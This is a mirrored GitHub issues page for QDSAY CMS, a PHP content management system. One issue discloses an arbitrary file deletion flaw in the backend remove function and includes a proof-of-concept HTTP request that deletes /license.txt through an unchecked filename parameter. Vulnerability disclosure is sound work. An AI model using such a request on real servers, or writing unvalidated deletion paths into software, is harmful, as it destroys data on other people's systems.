GithubHelp home page GithubHelp logo

qdsay / cms Goto Github PK

View Code? Open in Web Editor NEW
34.0 9.0 14.0 3.47 MB

勤道CMS不仅是一套极简的内容管理系统,还是一套PHP基础开发框架,他涵盖了我们日常开发中最常用的类库。与此同时,勤道CMS还提供了一套高可配置的脚手架程序(代码生成器),用于快速构建内容管理系统中的CRUD程序。

Home Page: http://www.qdsay.com

License: MIT License

ApacheConf 0.01% PHP 58.10% HTML 2.15% Smarty 1.83% CSS 2.96% JavaScript 34.70% PLpgSQL 0.25%

cms's Issues

QDSAY cms has an arbitrary file deletion vulnerability in the remove function in application\backend\core\QD_Controller.php

code
The function remove not limit the delete filename,so I can delete any file.
POC:

delete

GET /backend/article/remove?filename=%2Flicense.txt HTTP/1.1
Host: localhost
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
DNT: 1
Referer: http://localhost/backend/article/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1531379042; greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9pbmRleC5waHA%2FbT1hZG1pbiZjPXBvc3RzJmE9cG9zdHMmaWQ9MQ%3D%3D; greencms_post_add1=x%9C%85%8FK%0B%C20%10%84%FF%8A%EC%C1S%C5%24%B4M%8D%E2%C5%83%27O%1E%8DH%1Fi%0D%D44%98%CDA%C4%FFnJ%7D%80%82%9E%96%99%FDf%97%B9%82%ED%1C%1EPc%AB%40%80%F4i%C1%98%F4Y%5D%2A%E9%E3%9A%D7%D2%F3%84e%EB%B3Rf%B5%D9B4%F0egP%19%0C%89%85%5D%8EM%E1%EC%7C%F4%7F%F4%17S%22%7D2%E3U%14%84%A2i%7F%3E.%7F%85%16rj%97%E1o%99%A3%03%B1%03%0A%FB%080o%DEbhp%B1%7D%01%A7M%13%9A%3CL%879%FA%00%82%F5E%AB%DD%F1%E9%A3%3A%D96%C7%EF%00v6x%E4%29%AB%81a%84f%13%C2%27%94%8Dh%22%E8L%D0%17q%EA%2A%5DkU%7DP%A9+%5C%C4%2FJ%F7%7B%0A%B7%3B%29%BCqm; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1532595699; tm=20e0109ed56458f613d642c25308ebcc; ci_session=f381a36b9806873709c66b7841b4bae32054f2cc
Connection: close

I hope you can fix this vulnerability。
author by: [email protected]

Good Project

Very Good!!!

Greate Project!!!

I 服了 YOU,星哥!!!

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.